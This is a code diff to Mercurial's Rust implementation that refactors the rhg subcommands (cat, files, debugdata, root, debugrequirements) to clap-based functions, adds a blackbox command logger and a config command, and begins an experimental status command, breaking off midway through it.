- nt.find_bin(idx, (&node).into()).map_err(|e| nodemap_error(py, e))
+ nt.find_bin(idx, node.into()).map_err(|e| nodemap_error(py, e))
}
/// same as `get_rev()` but raises a bare `error.RevlogError` if node
@@ -107,7 +107,9 @@
String::from_utf8_lossy(node.data(py)).to_string()
};
- nt.find_hex(idx, &node_as_string)
+ let prefix = NodePrefix::from_hex(&node_as_string).map_err(|_| PyErr::new::<ValueError, _>(py, "Invalid node or prefix"))?;
+
+ nt.find_bin(idx, prefix)
// TODO make an inner API returning the node directly
.map(|opt| opt.map(
|rev| PyBytes::new(py, idx.node(rev).unwrap().as_bytes())))
@@ -283,6 +285,10 @@
self.inner_update_nodemap_data(py, docket, nm_data)
}
+ @property
+ def entry_size(&self) -> PyResult<PyInt> {
+ self.cindex(py).borrow().inner().getattr(py, "entry_size")?.extract::<PyInt>(py)
+ }
});
@@ -468,17 +474,9 @@
match err {
NodeMapError::MultipleResults => revlog_error(py),
NodeMapError::RevisionNotInIndex(r) => rev_not_in_index(py, r),
- NodeMapError::InvalidNodePrefix(s) => invalid_node_prefix(py, &s),
}
}
-fn invalid_node_prefix(py: Python, ne: &NodeError) -> PyErr {
- PyErr::new::<ValueError, _>(
- py,
- format!("Invalid node or prefix: {:?}", ne),
- )
-}
-
/// Create the module, with __package__ given from parent
pub fn init_module(py: Python, package: &str) -> PyResult<PyModule> {
let dotted_name = &format!("{}.revlog", package);
--- a/rust/hgcli/README.md Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hgcli/README.md Tue Apr 20 11:01:06 2021 -0400
@@ -32,7 +32,7 @@
Mercurial Distributed SCM (version 5.3.1+433-f99cd77d53dc+20200331)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-2020 Matt Mackall and others
+ Copyright (C) 2005-2020 Olivia Mackall and others
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
--- a/rust/rhg/Cargo.toml Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/Cargo.toml Tue Apr 20 11:01:06 2021 -0400
@@ -9,8 +9,13 @@
[dependencies]
hg-core = { path = "../hg-core"}
+chrono = "0.4.19"
clap = "2.33.1"
+derive_more = "0.99"
+lazy_static = "1.4.0"
log = "0.4.11"
micro-timer = "0.3.1"
+regex = "1.3.9"
env_logger = "0.7.1"
-format-bytes = "0.1.3"
+format-bytes = "0.2.1"
+users = "0.11.0"
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/rhg/src/blackbox.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,163 @@
+//! Logging for repository events, including commands run in the repository.
+
+use crate::CliInvocation;
+use format_bytes::format_bytes;
+use hg::errors::HgError;
+use hg::repo::Repo;
+use hg::utils::{files::get_bytes_from_os_str, shell_quote};
+
+const ONE_MEBIBYTE: u64 = 1 << 20;
+
+// TODO: somehow keep defaults in sync with `configitem` in `hgext/blackbox.py`
+const DEFAULT_MAX_SIZE: u64 = ONE_MEBIBYTE;
+const DEFAULT_MAX_FILES: u32 = 7;
+
+// Python does not support %.3f, only %f
+const DEFAULT_DATE_FORMAT: &str = "%Y/%m/%d %H:%M:%S%.3f";
+
+type DateTime = chrono::DateTime<chrono::Local>;
+
+pub struct ProcessStartTime {
+ /// For measuring duration
+ monotonic_clock: std::time::Instant,
+ /// For formatting with year, month, day, etc.
+ calendar_based: DateTime,
+}
+
+impl ProcessStartTime {
+ pub fn now() -> Self {
+ Self {
+ monotonic_clock: std::time::Instant::now(),
+ calendar_based: chrono::Local::now(),
+ }
+ }
+}
+
+pub struct Blackbox<'a> {
+ process_start_time: &'a ProcessStartTime,
+ /// Do nothing if this is `None`
+ configured: Option<ConfiguredBlackbox<'a>>,
+}
+
+struct ConfiguredBlackbox<'a> {
+ repo: &'a Repo,
+ max_size: u64,
+ max_files: u32,
+ date_format: &'a str,
+}
+
+impl<'a> Blackbox<'a> {
+ pub fn new(
+ invocation: &'a CliInvocation<'a>,
+ process_start_time: &'a ProcessStartTime,
+ ) -> Result<Self, HgError> {
+ let configured = if let Ok(repo) = invocation.repo {
+ if invocation.config.get(b"extensions", b"blackbox").is_none() {
+ // The extension is not enabled
+ None
+ } else {
+ Some(ConfiguredBlackbox {
+ repo,
+ max_size: invocation
+ .config
+ .get_byte_size(b"blackbox", b"maxsize")?
+ .unwrap_or(DEFAULT_MAX_SIZE),
+ max_files: invocation
+ .config
+ .get_u32(b"blackbox", b"maxfiles")?
+ .unwrap_or(DEFAULT_MAX_FILES),
+ date_format: invocation
+ .config
+ .get_str(b"blackbox", b"date-format")?
+ .unwrap_or(DEFAULT_DATE_FORMAT),
+ })
+ }
+ } else {
+ // Without a local repository there’s no `.hg/blackbox.log` to
+ // write to.
+ None
+ };
+ Ok(Self {
+ process_start_time,
+ configured,
+ })
+ }
+
+ pub fn log_command_start(&self) {
+ if let Some(configured) = &self.configured {
+ let message = format_bytes!(b"(rust) {}", format_cli_args());
+ configured.log(&self.process_start_time.calendar_based, &message);
+ }
+ }
+
+ pub fn log_command_end(&self, exit_code: i32) {
+ if let Some(configured) = &self.configured {
+ let now = chrono::Local::now();
+ let duration = self
+ .process_start_time
+ .monotonic_clock
+ .elapsed()
+ .as_secs_f64();
+ let message = format_bytes!(
+ b"(rust) {} exited {} after {} seconds",
+ format_cli_args(),
+ exit_code,
+ format_bytes::Utf8(format_args!("{:.03}", duration))
+ );
+ configured.log(&now, &message);
+ }
+ }
+}
+
+impl ConfiguredBlackbox<'_> {
+ fn log(&self, date_time: &DateTime, message: &[u8]) {
+ let date = format_bytes::Utf8(date_time.format(self.date_format));
+ let user = users::get_current_username().map(get_bytes_from_os_str);
+ let user = user.as_deref().unwrap_or(b"???");
+ let rev = format_bytes::Utf8(match self.repo.dirstate_parents() {
+ Ok(parents) if parents.p2 == hg::revlog::node::NULL_NODE => {
+ format!("{:x}", parents.p1)
+ }
+ Ok(parents) => format!("{:x}+{:x}", parents.p1, parents.p2),
+ Err(_dirstate_corruption_error) => {
+ // TODO: log a non-fatal warning to stderr
+ "???".to_owned()
+ }
+ });
+ let pid = std::process::id();
+ let line = format_bytes!(
+ b"{} {} @{} ({})> {}\n",
+ date,
+ user,
+ rev,
+ pid,
+ message
+ );
+ let result =
+ hg::logging::LogFile::new(self.repo.hg_vfs(), "blackbox.log")
+ .max_size(Some(self.max_size))
+ .max_files(self.max_files)
+ .write(&line);
+ match result {
+ Ok(()) => {}
+ Err(_io_error) => {
+ // TODO: log a non-fatal warning to stderr
+ }
+ }
+ }
+}
+
+fn format_cli_args() -> Vec<u8> {
+ let mut args = std::env::args_os();
+ let _ = args.next(); // Skip the first (or zeroth) arg, the name of the `rhg` executable
+ let mut args = args.map(|arg| shell_quote(&get_bytes_from_os_str(arg)));
+ let mut formatted = Vec::new();
+ if let Some(arg) = args.next() {
+ formatted.extend(arg)
+ }
+ for arg in args {
+ formatted.push(b' ');
+ formatted.extend(arg)
+ }
+ formatted
+}
--- a/rust/rhg/src/commands.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,14 +0,0 @@
-pub mod cat;
-pub mod debugdata;
-pub mod debugrequirements;
-pub mod files;
-pub mod root;
-use crate::error::CommandError;
-use crate::ui::Ui;
-
-/// The common trait for rhg commands
-///
-/// Normalize the interface of the commands provided by rhg
-pub trait Command {
- fn run(&self, ui: &Ui) -> Result<(), CommandError>;
-}
--- a/rust/rhg/src/commands/cat.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/cat.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,9 +1,7 @@
-use crate::commands::Command;
-use crate::error::{CommandError, CommandErrorKind};
-use crate::ui::utf8_to_local;
-use crate::ui::Ui;
-use hg::operations::{cat, CatRevError, CatRevErrorKind};
-use hg::repo::Repo;
+use crate::error::CommandError;
+use clap::Arg;
+use format_bytes::format_bytes;
+use hg::operations::cat;
use hg::utils::hg_path::HgPathBuf;
use micro_timer::timed;
use std::convert::TryFrom;
@@ -12,94 +10,75 @@
Output the current or given revision of files
";
-pub struct CatCommand<'a> {
- rev: Option<&'a str>,
- files: Vec<&'a str>,
-}
-
-impl<'a> CatCommand<'a> {
- pub fn new(rev: Option<&'a str>, files: Vec<&'a str>) -> Self {
- Self { rev, files }
- }
-
- fn display(&self, ui: &Ui, data: &[u8]) -> Result<(), CommandError> {
- ui.write_stdout(data)?;
- Ok(())
- }
-}
-
-impl<'a> Command for CatCommand<'a> {
- #[timed]
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- repo.check_requirements()?;
- let cwd = std::env::current_dir()
- .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?;
-
- let mut files = vec![];
- for file in self.files.iter() {
- let normalized = cwd.join(&file);
- let stripped = normalized
- .strip_prefix(&repo.working_directory_path())
- .or(Err(CommandErrorKind::Abort(None)))?;
- let hg_file = HgPathBuf::try_from(stripped.to_path_buf())
- .or(Err(CommandErrorKind::Abort(None)))?;
- files.push(hg_file);
- }
-
- match self.rev {
- Some(rev) => {
- let data = cat(&repo, rev, &files)
- .map_err(|e| map_rev_error(rev, e))?;
- self.display(ui, &data)
- }
- None => Err(CommandErrorKind::Unimplemented.into()),
- }
- }
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("cat")
+ .arg(
+ Arg::with_name("rev")
+ .help("search the repository as it is in REV")
+ .short("-r")
+ .long("--revision")
+ .value_name("REV")
+ .takes_value(true),
+ )
+ .arg(
+ clap::Arg::with_name("files")
+ .required(true)
+ .multiple(true)
+ .empty_values(false)
+ .value_name("FILE")
+ .help("Activity to start: activity@category"),
+ )
+ .about(HELP_TEXT)
}
-/// Convert `CatRevErrorKind` to `CommandError`
-fn map_rev_error(rev: &str, err: CatRevError) -> CommandError {
- CommandError {
- kind: match err.kind {
- CatRevErrorKind::IoError(err) => CommandErrorKind::Abort(Some(
- utf8_to_local(&format!("abort: {}\n", err)).into(),
- )),
- CatRevErrorKind::InvalidRevision => CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: invalid revision identifier {}\n",
- rev
- ))
- .into(),
- )),
- CatRevErrorKind::AmbiguousPrefix => CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: ambiguous revision identifier {}\n",
- rev
- ))
- .into(),
- )),
- CatRevErrorKind::UnsuportedRevlogVersion(version) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unsupported revlog version {}\n",
- version
- ))
- .into(),
- ))
+#[timed]
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let rev = invocation.subcommand_args.value_of("rev");
+ let file_args = match invocation.subcommand_args.values_of("files") {
+ Some(files) => files.collect(),
+ None => vec![],
+ };
+
+ let repo = invocation.repo?;
+ let cwd = hg::utils::current_dir()?;
+ let working_directory = repo.working_directory_path();
+ let working_directory = cwd.join(working_directory); // Make it absolute
+
+ let mut files = vec![];
+ for file in file_args.iter() {
+ // TODO: actually normalize `..` path segments etc?
+ let normalized = cwd.join(&file);
+ let stripped = normalized
+ .strip_prefix(&working_directory)
+ // TODO: error message for path arguments outside of the repo
+ .map_err(|_| CommandError::abort(""))?;
+ let hg_file = HgPathBuf::try_from(stripped.to_path_buf())
+ .map_err(|e| CommandError::abort(e.to_string()))?;
+ files.push(hg_file);
+ }
+
+ match rev {
+ Some(rev) => {
+ let output = cat(&repo, rev, &files).map_err(|e| (e, rev))?;
+ invocation.ui.write_stdout(&output.concatenated)?;
+ if !output.missing.is_empty() {
+ let short = format!("{:x}", output.node.short()).into_bytes();
+ for path in &output.missing {
+ invocation.ui.write_stderr(&format_bytes!(
+ b"{}: no such file in rev {}\n",
+ path.as_bytes(),
+ short
+ ))?;
+ }
}
- CatRevErrorKind::CorruptedRevlog => CommandErrorKind::Abort(Some(
- "abort: corrupted revlog\n".into(),
- )),
- CatRevErrorKind::UnknowRevlogDataFormat(format) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unknow revlog dataformat {:?}\n",
- format
- ))
- .into(),
- ))
+ if output.found_any {
+ Ok(())
+ } else {
+ Err(CommandError::Unsuccessful)
}
- },
+ }
+ None => Err(CommandError::unsupported(
+ "`rhg cat` without `--rev` / `-r`",
+ )),
}
}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/rhg/src/commands/config.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,38 @@
+use crate::error::CommandError;
+use clap::Arg;
+use format_bytes::format_bytes;
+use hg::errors::HgError;
+use hg::utils::SliceExt;
+
+pub const HELP_TEXT: &str = "
+With one argument of the form section.name, print just the value of that config item.
+";
+
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("config")
+ .arg(
+ Arg::with_name("name")
+ .help("the section.name to print")
+ .value_name("NAME")
+ .required(true)
+ .takes_value(true),
+ )
+ .about(HELP_TEXT)
+}
+
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let (section, name) = invocation
+ .subcommand_args
+ .value_of("name")
+ .expect("missing required CLI argument")
+ .as_bytes()
+ .split_2(b'.')
+ .ok_or_else(|| HgError::unsupported("hg config <section>"))?;
+
+ if let Some(value) = invocation.config.get(section, name) {
+ invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?;
+ Ok(())
+ } else {
+ Err(CommandError::Unsuccessful)
+ }
+}
--- a/rust/rhg/src/commands/debugdata.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/debugdata.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,91 +1,65 @@
-use crate::commands::Command;
-use crate::error::{CommandError, CommandErrorKind};
-use crate::ui::utf8_to_local;
-use crate::ui::Ui;
-use hg::operations::{
- debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind,
-};
-use hg::repo::Repo;
+use crate::error::CommandError;
+use clap::Arg;
+use clap::ArgGroup;
+use hg::operations::{debug_data, DebugDataKind};
use micro_timer::timed;
pub const HELP_TEXT: &str = "
Dump the contents of a data file revision
";
-pub struct DebugDataCommand<'a> {
- rev: &'a str,
- kind: DebugDataKind,
-}
-
-impl<'a> DebugDataCommand<'a> {
- pub fn new(rev: &'a str, kind: DebugDataKind) -> Self {
- DebugDataCommand { rev, kind }
- }
-}
-
-impl<'a> Command for DebugDataCommand<'a> {
- #[timed]
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- let data = debug_data(&repo, self.rev, self.kind)
- .map_err(|e| to_command_error(self.rev, e))?;
-
- let mut stdout = ui.stdout_buffer();
- stdout.write_all(&data)?;
- stdout.flush()?;
-
- Ok(())
- }
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("debugdata")
+ .arg(
+ Arg::with_name("changelog")
+ .help("open changelog")
+ .short("-c")
+ .long("--changelog"),
+ )
+ .arg(
+ Arg::with_name("manifest")
+ .help("open manifest")
+ .short("-m")
+ .long("--manifest"),
+ )
+ .group(
+ ArgGroup::with_name("")
+ .args(&["changelog", "manifest"])
+ .required(true),
+ )
+ .arg(
+ Arg::with_name("rev")
+ .help("revision")
+ .required(true)
+ .value_name("REV"),
+ )
+ .about(HELP_TEXT)
}
-/// Convert operation errors to command errors
-fn to_command_error(rev: &str, err: DebugDataError) -> CommandError {
- match err.kind {
- DebugDataErrorKind::IoError(err) => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!("abort: {}\n", err)).into(),
- )),
- },
- DebugDataErrorKind::InvalidRevision => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: invalid revision identifier{}\n",
- rev
- ))
- .into(),
- )),
- },
- DebugDataErrorKind::AmbiguousPrefix => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: ambiguous revision identifier{}\n",
- rev
- ))
- .into(),
- )),
- },
- DebugDataErrorKind::UnsuportedRevlogVersion(version) => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unsupported revlog version {}\n",
- version
- ))
- .into(),
- )),
- },
- DebugDataErrorKind::CorruptedRevlog => CommandError {
- kind: CommandErrorKind::Abort(Some(
- "abort: corrupted revlog\n".into(),
- )),
- },
- DebugDataErrorKind::UnknowRevlogDataFormat(format) => CommandError {
- kind: CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unknow revlog dataformat {:?}\n",
- format
- ))
- .into(),
- )),
- },
- }
+#[timed]
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let args = invocation.subcommand_args;
+ let rev = args
+ .value_of("rev")
+ .expect("rev should be a required argument");
+ let kind =
+ match (args.is_present("changelog"), args.is_present("manifest")) {
+ (true, false) => DebugDataKind::Changelog,
+ (false, true) => DebugDataKind::Manifest,
+ (true, true) => {
+ unreachable!("Should not happen since options are exclusive")
+ }
+ (false, false) => {
+ unreachable!("Should not happen since options are required")
+ }
+ };
+
+ let repo = invocation.repo?;
+ let data = debug_data(repo, rev, kind).map_err(|e| (e, rev))?;
+
+ let mut stdout = invocation.ui.stdout_buffer();
+ stdout.write_all(&data)?;
+ stdout.flush()?;
+
+ Ok(())
}
--- a/rust/rhg/src/commands/debugrequirements.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/debugrequirements.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,30 +1,22 @@
-use crate::commands::Command;
use crate::error::CommandError;
-use crate::ui::Ui;
-use hg::repo::Repo;
-use hg::requirements;
pub const HELP_TEXT: &str = "
Print the current repo requirements.
";
-pub struct DebugRequirementsCommand {}
-
-impl DebugRequirementsCommand {
- pub fn new() -> Self {
- DebugRequirementsCommand {}
- }
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("debugrequirements").about(HELP_TEXT)
}
-impl Command for DebugRequirementsCommand {
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- let mut output = String::new();
- for req in requirements::load(&repo)? {
- output.push_str(&req);
- output.push('\n');
- }
- ui.write_stdout(output.as_bytes())?;
- Ok(())
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let repo = invocation.repo?;
+ let mut output = String::new();
+ let mut requirements: Vec<_> = repo.requirements().iter().collect();
+ requirements.sort();
+ for req in requirements {
+ output.push_str(req);
+ output.push('\n');
}
+ invocation.ui.write_stdout(output.as_bytes())?;
+ Ok(())
}
--- a/rust/rhg/src/commands/files.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/files.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,15 +1,10 @@
-use crate::commands::Command;
-use crate::error::{CommandError, CommandErrorKind};
-use crate::ui::utf8_to_local;
+use crate::error::CommandError;
use crate::ui::Ui;
-use hg::operations::{
- list_rev_tracked_files, ListRevTrackedFilesError,
- ListRevTrackedFilesErrorKind,
-};
-use hg::operations::{
- Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind,
-};
+use clap::Arg;
+use hg::operations::list_rev_tracked_files;
+use hg::operations::Dirstate;
use hg::repo::Repo;
+use hg::utils::current_dir;
use hg::utils::files::{get_bytes_from_path, relativize_path};
use hg::utils::hg_path::{HgPath, HgPathBuf};
@@ -19,124 +14,78 @@
Returns 0 on success.
";
-pub struct FilesCommand<'a> {
- rev: Option<&'a str>,
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("files")
+ .arg(
+ Arg::with_name("rev")
+ .help("search the repository as it is in REV")
+ .short("-r")
+ .long("--revision")
+ .value_name("REV")
+ .takes_value(true),
+ )
+ .about(HELP_TEXT)
}
-impl<'a> FilesCommand<'a> {
- pub fn new(rev: Option<&'a str>) -> Self {
- FilesCommand { rev }
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let relative = invocation.config.get(b"ui", b"relative-paths");
+ if relative.is_some() {
+ return Err(CommandError::unsupported(
+ "non-default ui.relative-paths",
+ ));
}
- fn display_files(
- &self,
- ui: &Ui,
- repo: &Repo,
- files: impl IntoIterator<Item = &'a HgPath>,
- ) -> Result<(), CommandError> {
- let cwd = std::env::current_dir()
- .or_else(|e| Err(CommandErrorKind::CurrentDirNotFound(e)))?;
- let rooted_cwd = cwd
- .strip_prefix(repo.working_directory_path())
- .expect("cwd was already checked within the repository");
- let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd));
-
- let mut stdout = ui.stdout_buffer();
+ let rev = invocation.subcommand_args.value_of("rev");
- for file in files {
- stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?;
- stdout.write_all(b"\n")?;
- }
- stdout.flush()?;
- Ok(())
- }
-}
-
-impl<'a> Command for FilesCommand<'a> {
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- repo.check_requirements()?;
- if let Some(rev) = self.rev {
- let files = list_rev_tracked_files(&repo, rev)
- .map_err(|e| map_rev_error(rev, e))?;
- self.display_files(ui, &repo, files.iter())
- } else {
- let distate = Dirstate::new(&repo).map_err(map_dirstate_error)?;
- let files = distate.tracked_files().map_err(map_dirstate_error)?;
- self.display_files(ui, &repo, files)
- }
+ let repo = invocation.repo?;
+ if let Some(rev) = rev {
+ let files = list_rev_tracked_files(repo, rev).map_err(|e| (e, rev))?;
+ display_files(invocation.ui, repo, files.iter())
+ } else {
+ let distate = Dirstate::new(repo)?;
+ let files = distate.tracked_files()?;
+ display_files(invocation.ui, repo, files)
}
}
-/// Convert `ListRevTrackedFilesErrorKind` to `CommandError`
-fn map_rev_error(rev: &str, err: ListRevTrackedFilesError) -> CommandError {
- CommandError {
- kind: match err.kind {
- ListRevTrackedFilesErrorKind::IoError(err) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!("abort: {}\n", err)).into(),
- ))
- }
- ListRevTrackedFilesErrorKind::InvalidRevision => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: invalid revision identifier {}\n",
- rev
- ))
- .into(),
- ))
- }
- ListRevTrackedFilesErrorKind::AmbiguousPrefix => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: ambiguous revision identifier {}\n",
- rev
- ))
- .into(),
- ))
- }
- ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unsupported revlog version {}\n",
- version
- ))
- .into(),
- ))
- }
- ListRevTrackedFilesErrorKind::CorruptedRevlog => {
- CommandErrorKind::Abort(Some(
- "abort: corrupted revlog\n".into(),
- ))
- }
- ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!(
- "abort: unknow revlog dataformat {:?}\n",
- format
- ))
- .into(),
- ))
- }
- },
+fn display_files<'a>(
+ ui: &Ui,
+ repo: &Repo,
+ files: impl IntoIterator<Item = &'a HgPath>,
+) -> Result<(), CommandError> {
+ let mut stdout = ui.stdout_buffer();
+
+ let cwd = current_dir()?;
+ let working_directory = repo.working_directory_path();
+ let working_directory = cwd.join(working_directory); // Make it absolute
+
+ let mut any = false;
+ if let Ok(cwd_relative_to_repo) = cwd.strip_prefix(&working_directory) {
+ // The current directory is inside the repo, so we can work with
+ // relative paths
+ let cwd = HgPathBuf::from(get_bytes_from_path(cwd_relative_to_repo));
+ for file in files {
+ any = true;
+ stdout.write_all(relativize_path(&file, &cwd).as_ref())?;
+ stdout.write_all(b"\n")?;
+ }
+ } else {
+ let working_directory =
+ HgPathBuf::from(get_bytes_from_path(working_directory));
+ let cwd = HgPathBuf::from(get_bytes_from_path(cwd));
+ for file in files {
+ any = true;
+ // Absolute path in the filesystem
+ let file = working_directory.join(file);
+ stdout.write_all(relativize_path(&file, &cwd).as_ref())?;
+ stdout.write_all(b"\n")?;
+ }
+ }
+
+ stdout.flush()?;
+ if any {
+ Ok(())
+ } else {
+ Err(CommandError::Unsuccessful)
}
}
-
-/// Convert `ListDirstateTrackedFilesError` to `CommandError`
-fn map_dirstate_error(err: ListDirstateTrackedFilesError) -> CommandError {
- CommandError {
- kind: match err.kind {
- ListDirstateTrackedFilesErrorKind::IoError(err) => {
- CommandErrorKind::Abort(Some(
- utf8_to_local(&format!("abort: {}\n", err)).into(),
- ))
- }
- ListDirstateTrackedFilesErrorKind::ParseError(_) => {
- CommandErrorKind::Abort(Some(
- // TODO find a better error message
- b"abort: parse error\n".to_vec(),
- ))
- }
- },
- }
-}
--- a/rust/rhg/src/commands/root.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/commands/root.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,8 +1,6 @@
-use crate::commands::Command;
use crate::error::CommandError;
-use crate::ui::Ui;
use format_bytes::format_bytes;
-use hg::repo::Repo;
+use hg::errors::{IoErrorContext, IoResultExt};
use hg::utils::files::get_bytes_from_path;
pub const HELP_TEXT: &str = "
@@ -11,19 +9,20 @@
Returns 0 on success.
";
-pub struct RootCommand {}
-
-impl RootCommand {
- pub fn new() -> Self {
- RootCommand {}
- }
+pub fn args() -> clap::App<'static, 'static> {
+ clap::SubCommand::with_name("root").about(HELP_TEXT)
}
-impl Command for RootCommand {
- fn run(&self, ui: &Ui) -> Result<(), CommandError> {
- let repo = Repo::find()?;
- let bytes = get_bytes_from_path(repo.working_directory_path());
- ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?;
- Ok(())
- }
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let repo = invocation.repo?;
+ let working_directory = repo.working_directory_path();
+ let working_directory = std::fs::canonicalize(working_directory)
+ .with_context(|| {
+ IoErrorContext::CanonicalizingPath(working_directory.to_owned())
+ })?;
+ let bytes = get_bytes_from_path(&working_directory);
+ invocation
+ .ui
+ .write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?;
+ Ok(())
}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/rhg/src/commands/status.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,315 @@
+// status.rs
+//
+// Copyright 2020, Georges Racinet <georges.racinets@octobus.net>
+//
+// This software may be used and distributed according to the terms of the
+// GNU General Public License version 2 or any later version.
+
+use crate::error::CommandError;
+use crate::ui::Ui;
+use clap::{Arg, SubCommand};
+use hg;
+use hg::errors::IoResultExt;
+use hg::matchers::AlwaysMatcher;
+use hg::operations::cat;
+use hg::repo::Repo;
+use hg::revlog::node::Node;
+use hg::utils::hg_path::{hg_path_to_os_string, HgPath};
+use hg::{DirstateMap, StatusError};
+use hg::{HgPathCow, StatusOptions};
+use log::{info, warn};
+use std::convert::TryInto;
+use std::fs;
+use std::io::BufReader;
+use std::io::Read;
+
+pub const HELP_TEXT: &str = "
+Show changed files in the working directory
+
+This is a pure Rust version of `hg status`.
+
+Some options might be missing, check the list below.
+";
+
+pub fn args() -> clap::App<'static, 'static> {
+ SubCommand::with_name("status")
+ .alias("st")
+ .about(HELP_TEXT)
+ .arg(
+ Arg::with_name("all")
+ .help("show status of all files")
+ .short("-A")
+ .long("--all"),
+ )
+ .arg(
+ Arg::with_name("modified")
+ .help("show only modified files")
+ .short("-m")
+ .long("--modified"),
+ )
+ .arg(
+ Arg::with_name("added")
+ .help("show only added files")
+ .short("-a")
+ .long("--added"),
+ )
+ .arg(
+ Arg::with_name("removed")
+ .help("show only removed files")
+ .short("-r")
+ .long("--removed"),
+ )
+ .arg(
+ Arg::with_name("clean")
+ .help("show only clean files")
+ .short("-c")
+ .long("--clean"),
+ )
+ .arg(
+ Arg::with_name("deleted")
+ .help("show only deleted files")
+ .short("-d")
+ .long("--deleted"),
+ )
+ .arg(
+ Arg::with_name("unknown")
+ .help("show only unknown (not tracked) files")
+ .short("-u")
+ .long("--unknown"),
+ )
+ .arg(
+ Arg::with_name("ignored")
+ .help("show only ignored files")
+ .short("-i")
+ .long("--ignored"),
+ )
+}
+
+/// Pure data type allowing the caller to specify file states to display
+#[derive(Copy, Clone, Debug)]
+pub struct DisplayStates {
+ pub modified: bool,
+ pub added: bool,
+ pub removed: bool,
+ pub clean: bool,
+ pub deleted: bool,
+ pub unknown: bool,
+ pub ignored: bool,
+}
+
+pub const DEFAULT_DISPLAY_STATES: DisplayStates = DisplayStates {
+ modified: true,
+ added: true,
+ removed: true,
+ clean: false,
+ deleted: true,
+ unknown: true,
+ ignored: false,
+};
+
+pub const ALL_DISPLAY_STATES: DisplayStates = DisplayStates {
+ modified: true,
+ added: true,
+ removed: true,
+ clean: true,
+ deleted: true,
+ unknown: true,
+ ignored: true,
+};
+
+impl DisplayStates {
+ pub fn is_empty(&self) -> bool {
+ !(self.modified
+ || self.added
+ || self.removed
+ || self.clean
+ || self.deleted
+ || self.unknown
+ || self.ignored)
+ }
+}
+
+pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> {
+ let status_enabled_default = false;
+ let status_enabled = invocation.config.get_option(b"rhg", b"status")?;
+ if !status_enabled.unwrap_or(status_enabled_default) {
+ return Err(CommandError::unsupported(
+ "status is experimental in rhg (enable it with 'rhg.status = true' \
+ or enable fallback with 'rhg.on-unsupported = fallback')"
+ ));
+ }
+
+ let ui = invocation.ui;
+ let args = invocation.subcommand_args;
+ let display_states = if args.is_present("all") {
+ // TODO when implementing `--quiet`: it excludes clean files
+ // from `--all`
+ ALL_DISPLAY_STATES
+ } else {
+ let requested = DisplayStates {
+ modified: args.is_present("modified"),
+ added: args.is_present("added"),
